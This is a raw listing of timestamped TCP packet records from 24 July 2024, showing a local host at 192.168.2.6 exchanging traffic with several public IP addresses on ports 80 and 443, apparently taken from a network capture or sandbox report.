                                                                                        Jul 24, 2024 07:14:27.794372082 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.794404984 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.794419050 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.794439077 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.794450045 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.794471979 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.794504881 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.794517040 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.794806957 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.795182943 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.795218945 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.795243025 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.795253038 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.795259953 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.795285940 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.795295000 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.795320034 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.795330048 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.795355082 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.795361996 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.795398951 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.796022892 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.796056986 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.796077013 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.796088934 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.796098948 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.796124935 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.796158075 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.796164989 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.796191931 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.796237946 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.796895981 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.796931028 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.796941996 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.796964884 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.796999931 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.797008991 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.797033072 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.797076941 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.797895908 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.797930956 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.797950983 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.797969103 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.798145056 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.798199892 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.798245907 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.798280001 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.798291922 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.798538923 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.798588991 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.798592091 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.798624992 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.798656940 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.798670053 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.798688889 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.798700094 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.798998117 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.863611937 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.863681078 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.863739967 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.863775969 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.863787889 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.864139080 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.864173889 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.864190102 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.864208937 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.864226103 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.864243984 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.864260912 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.864285946 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.864758015 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.864793062 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.864804983 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.864830017 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.864840031 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.864864111 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.864877939 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.864897013 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.864909887 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.864942074 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.865278006 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.865310907 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.865325928 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.865366936 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.865487099 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.865520000 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.865534067 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.865554094 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.865562916 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.865587950 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.865593910 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.865621090 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.865633011 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.865670919 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.866296053 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.866331100 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.866352081 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.866364002 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.866374969 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.866400003 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.866411924 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.866431952 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.866467953 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.866477966 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.866909027 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.867124081 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.867158890 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.867172956 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.867192984 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.867202997 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.867228031 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.867238045 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.867263079 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.867275953 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.867397070 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.867978096 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.868012905 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.868026018 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.868046999 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.868051052 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.868082047 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.868113995 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.868113995 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.868130922 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.868149042 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.868201971 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.868833065 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.868869066 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.868887901 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.868901014 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.868923903 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.868937016 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.868969917 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.868992090 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.869014978 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.869621992 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.869656086 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.869678974 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.869688988 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.869719028 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.869723082 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.869731903 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.869756937 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.869765997 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.869791031 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.869820118 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.869822025 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.869837999 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.869889021 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.870455980 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.870501041 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.870508909 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.870539904 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.870548964 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.870573044 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.870583057 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.870606899 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.870630026 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.870640993 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.870651007 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.870681047 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.871022940 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.871058941 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.871109009 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.886823893 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.886905909 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.886914015 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.886940956 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.886977911 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.886993885 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.888603926 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.888638020 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.888669014 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.888670921 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.888679981 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.888705015 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.888730049 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.888737917 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.888751030 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.888772964 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.888787985 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.888806105 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.888813972 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.888839960 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.888850927 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.888878107 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.888887882 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.888911963 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.888943911 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.888959885 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.888993979 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.889030933 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.889045000 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.889064074 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.889076948 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.889098883 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.889108896 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.889143944 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:28.414890051 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:28.415035009 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:29.531593084 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:29.531977892 CEST4972780192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:29.536504030 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:29.536892891 CEST804972785.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:29.536984921 CEST4972780192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:29.548319101 CEST4972780192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:29.553307056 CEST804972785.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:30.549968958 CEST804972785.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:30.550052881 CEST4972780192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:30.851347923 CEST4972780192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:30.856447935 CEST804972785.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:31.038716078 CEST804972785.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:31.038992882 CEST4972780192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:31.706784010 CEST49731443192.168.2.6216.58.206.46
                                                                                        Jul 24, 2024 07:14:31.706832886 CEST44349731216.58.206.46192.168.2.6
                                                                                        Jul 24, 2024 07:14:31.706899881 CEST49731443192.168.2.6216.58.206.46
                                                                                        Jul 24, 2024 07:14:31.795164108 CEST4972780192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:31.800446987 CEST804972785.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:31.941102982 CEST49731443192.168.2.6216.58.206.46
                                                                                        Jul 24, 2024 07:14:31.941142082 CEST44349731216.58.206.46192.168.2.6
                                                                                        Jul 24, 2024 07:14:32.017823935 CEST49735443192.168.2.694.245.104.56
                                                                                        Jul 24, 2024 07:14:32.017848969 CEST4434973594.245.104.56192.168.2.6
                                                                                        Jul 24, 2024 07:14:32.018001080 CEST49735443192.168.2.694.245.104.56
                                                                                        Jul 24, 2024 07:14:32.019669056 CEST49735443192.168.2.694.245.104.56
                                                                                        Jul 24, 2024 07:14:32.019681931 CEST4434973594.245.104.56192.168.2.6
                                                                                        Jul 24, 2024 07:14:32.486737967 CEST804972785.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:32.486839056 CEST4972780192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:32.612030983 CEST44349731216.58.206.46192.168.2.6
                                                                                        Jul 24, 2024 07:14:32.612415075 CEST49731443192.168.2.6216.58.206.46
                                                                                        Jul 24, 2024 07:14:32.612445116 CEST44349731216.58.206.46192.168.2.6
                                                                                        Jul 24, 2024 07:14:32.612833977 CEST44349731216.58.206.46192.168.2.6
                                                                                        Jul 24, 2024 07:14:32.612895012 CEST49731443192.168.2.6216.58.206.46
                                                                                        Jul 24, 2024 07:14:32.613512993 CEST44349731216.58.206.46192.168.2.6
                                                                                        Jul 24, 2024 07:14:32.613564968 CEST49731443192.168.2.6216.58.206.46
                                                                                        Jul 24, 2024 07:14:32.619402885 CEST49731443192.168.2.6216.58.206.46
                                                                                        Jul 24, 2024 07:14:32.619471073 CEST44349731216.58.206.46192.168.2.6
                                                                                        Jul 24, 2024 07:14:32.619927883 CEST49731443192.168.2.6216.58.206.46
                                                                                        Jul 24, 2024 07:14:32.619937897 CEST44349731216.58.206.46192.168.2.6
                                                                                        Jul 24, 2024 07:14:32.828495979 CEST44349731216.58.206.46192.168.2.6
                                                                                        Jul 24, 2024 07:14:32.828609943 CEST49731443192.168.2.6216.58.206.46
                                                                                        Jul 24, 2024 07:14:32.844876051 CEST4434973594.245.104.56192.168.2.6
                                                                                        Jul 24, 2024 07:14:32.918931961 CEST44349731216.58.206.46192.168.2.6
                                                                                        Jul 24, 2024 07:14:32.919128895 CEST49731443192.168.2.6216.58.206.46
                                                                                        Jul 24, 2024 07:14:32.919148922 CEST44349731216.58.206.46192.168.2.6
                                                                                        Jul 24, 2024 07:14:32.919647932 CEST44349731216.58.206.46192.168.2.6
                                                                                        Jul 24, 2024 07:14:32.919697046 CEST49731443192.168.2.6216.58.206.46
                                                                                        Jul 24, 2024 07:14:32.976252079 CEST49735443192.168.2.694.245.104.56
                                                                                        Jul 24, 2024 07:14:33.250849009 CEST49735443192.168.2.694.245.104.56
                                                                                        Jul 24, 2024 07:14:33.250861883 CEST4434973594.245.104.56192.168.2.6
                                                                                        Jul 24, 2024 07:14:33.252531052 CEST4434973594.245.104.56192.168.2.6
                                                                                        Jul 24, 2024 07:14:33.252548933 CEST4434973594.245.104.56192.168.2.6
                                                                                        Jul 24, 2024 07:14:33.252616882 CEST49735443192.168.2.694.245.104.56
                                                                                        Jul 24, 2024 07:14:33.280153990 CEST49731443192.168.2.6216.58.206.46
                                                                                        Jul 24, 2024 07:14:33.280178070 CEST44349731216.58.206.46192.168.2.6
                                                                                        Jul 24, 2024 07:14:33.283627987 CEST49735443192.168.2.694.245.104.56
                                                                                        Jul 24, 2024 07:14:33.283716917 CEST4434973594.245.104.56192.168.2.6
                                                                                        Jul 24, 2024 07:14:33.284032106 CEST49735443192.168.2.694.245.104.56
                                                                                        Jul 24, 2024 07:14:33.284038067 CEST4434973594.245.104.56192.168.2.6
                                                                                        Jul 24, 2024 07:14:33.372231007 CEST49735443192.168.2.694.245.104.56
                                                                                        Jul 24, 2024 07:14:33.466351986 CEST4434973594.245.104.56192.168.2.6
                                                                                        Jul 24, 2024 07:14:33.466480017 CEST4434973594.245.104.56192.168.2.6
                                                                                        Jul 24, 2024 07:14:33.466578007 CEST49735443192.168.2.694.245.104.56
                                                                                        Jul 24, 2024 07:14:33.592354059 CEST49735443192.168.2.694.245.104.56
                                                                                        Jul 24, 2024 07:14:33.592379093 CEST4434973594.245.104.56192.168.2.6
                                                                                        Jul 24, 2024 07:14:36.619008064 CEST49750443192.168.2.6172.64.41.3
                                                                                        Jul 24, 2024 07:14:36.619043112 CEST44349750172.64.41.3192.168.2.6
                                                                                        Jul 24, 2024 07:14:36.619102001 CEST49750443192.168.2.6172.64.41.3
                                                                                        Jul 24, 2024 07:14:36.619466066 CEST49750443192.168.2.6172.64.41.3
                                                                                        Jul 24, 2024 07:14:36.619477987 CEST44349750172.64.41.3192.168.2.6
                                                                                        Jul 24, 2024 07:14:36.652146101 CEST49751443192.168.2.6172.64.41.3
                                                                                        Jul 24, 2024 07:14:36.652229071 CEST44349751172.64.41.3192.168.2.6
                                                                                        Jul 24, 2024 07:14:36.652307034 CEST49751443192.168.2.6172.64.41.3
                                                                                        Jul 24, 2024 07:14:36.652666092 CEST49751443192.168.2.6172.64.41.3
                                                                                        Jul 24, 2024 07:14:36.652697086 CEST44349751172.64.41.3192.168.2.6
                                                                                        Jul 24, 2024 07:14:36.662147999 CEST49752443192.168.2.6162.159.61.3
                                                                                        Jul 24, 2024 07:14:36.662167072 CEST44349752162.159.61.3192.168.2.6
                                                                                        Jul 24, 2024 07:14:36.662362099 CEST49752443192.168.2.6162.159.61.3
                                                                                        Jul 24, 2024 07:14:36.663728952 CEST49752443192.168.2.6162.159.61.3
                                                                                        Jul 24, 2024 07:14:36.663739920 CEST44349752162.159.61.3192.168.2.6
                                                                                        Jul 24, 2024 07:14:37.120539904 CEST44349750172.64.41.3192.168.2.6
                                                                                        Jul 24, 2024 07:14:37.126136065 CEST44349751172.64.41.3192.168.2.6
                                                                                        Jul 24, 2024 07:14:37.134721041 CEST49750443192.168.2.6172.64.41.3
                                                                                        Jul 24, 2024 07:14:37.134731054 CEST44349750172.64.41.3192.168.2.6
                                                                                        Jul 24, 2024 07:14:37.134871006 CEST49751443192.168.2.6172.64.41.3
                                                                                        Jul 24, 2024 07:14:37.134886980 CEST44349751172.64.41.3192.168.2.6
                                                                                        Jul 24, 2024 07:14:37.137758017 CEST44349751172.64.41.3192.168.2.6
                                                                                        Jul 24, 2024 07:14:37.137820005 CEST49751443192.168.2.6172.64.41.3
                                                                                        Jul 24, 2024 07:14:37.138365984 CEST44349750172.64.41.3192.168.2.6
                                                                                        Jul 24, 2024 07:14:37.138441086 CEST49750443192.168.2.6172.64.41.3
                                                                                        Jul 24, 2024 07:14:37.147593975 CEST44349752162.159.61.3192.168.2.6
                                                                                        Jul 24, 2024 07:14:37.149063110 CEST49751443192.168.2.6172.64.41.3
                                                                                        Jul 24, 2024 07:14:37.149257898 CEST44349751172.64.41.3192.168.2.6
                                                                                        Jul 24, 2024 07:14:37.149632931 CEST49752443192.168.2.6162.159.61.3
                                                                                        Jul 24, 2024 07:14:37.149640083 CEST44349752162.159.61.3192.168.2.6
                                                                                        Jul 24, 2024 07:14:37.150413990 CEST49750443192.168.2.6172.64.41.3
                                                                                        Jul 24, 2024 07:14:37.150566101 CEST49751443192.168.2.6172.64.41.3
                                                                                        Jul 24, 2024 07:14:37.150597095 CEST44349750172.64.41.3192.168.2.6
                                                                                        Jul 24, 2024 07:14:37.150600910 CEST44349751172.64.41.3192.168.2.6
                                                                                        Jul 24, 2024 07:14:37.150660038 CEST44349752162.159.61.3192.168.2.6
                                                                                        Jul 24, 2024 07:14:37.150712013 CEST49752443192.168.2.6162.159.61.3
                                                                                        Jul 24, 2024 07:14:37.151833057 CEST49752443192.168.2.6162.159.61.3
                                                                                        Jul 24, 2024 07:14:37.151896000 CEST44349752162.159.61.3192.168.2.6
                                                                                        Jul 24, 2024 07:14:37.152066946 CEST49750443192.168.2.6172.64.41.3
                                                                                        Jul 24, 2024 07:14:37.152076006 CEST44349750172.64.41.3192.168.2.6
                                                                                        Jul 24, 2024 07:14:37.152352095 CEST49752443192.168.2.6162.159.61.3
                                                                                        Jul 24, 2024 07:14:37.152358055 CEST44349752162.159.61.3192.168.2.6
                                                                                        Jul 24, 2024 07:14:37.220272064 CEST49750443192.168.2.6172.64.41.3
                                                                                        Jul 24, 2024 07:14:37.282701015 CEST49751443192.168.2.6172.64.41.3
                                                                                        Jul 24, 2024 07:14:37.282881975 CEST49752443192.168.2.6162.159.61.3
                                                                                        Jul 24, 2024 07:14:37.294270992 CEST44349751172.64.41.3192.168.2.6
                                                                                        Jul 24, 2024 07:14:37.294368029 CEST44349751172.64.41.3192.168.2.6
                                                                                        Jul 24, 2024 07:14:37.294572115 CEST49751443192.168.2.6172.64.41.3
                                                                                        Jul 24, 2024 07:14:37.294631958 CEST44349750172.64.41.3192.168.2.6
                                                                                        Jul 24, 2024 07:14:37.294823885 CEST44349750172.64.41.3192.168.2.6
                                                                                        Jul 24, 2024 07:14:37.294895887 CEST49750443192.168.2.6172.64.41.3
                                                                                        Jul 24, 2024 07:14:37.304271936 CEST44349752162.159.61.3192.168.2.6
                                                                                        Jul 24, 2024 07:14:37.304356098 CEST44349752162.159.61.3192.168.2.6
                                                                                        Jul 24, 2024 07:14:37.304416895 CEST49752443192.168.2.6162.159.61.3
                                                                                        Jul 24, 2024 07:14:37.344523907 CEST49751443192.168.2.6172.64.41.3
                                                                                        Jul 24, 2024 07:14:37.344557047 CEST44349751172.64.41.3192.168.2.6
                                                                                        Jul 24, 2024 07:14:37.349953890 CEST49750443192.168.2.6172.64.41.3
                                                                                        Jul 24, 2024 07:14:37.349976063 CEST44349750172.64.41.3192.168.2.6
                                                                                        Jul 24, 2024 07:14:37.350250006 CEST49752443192.168.2.6162.159.61.3
                                                                                        Jul 24, 2024 07:14:37.350254059 CEST44349752162.159.61.3192.168.2.6
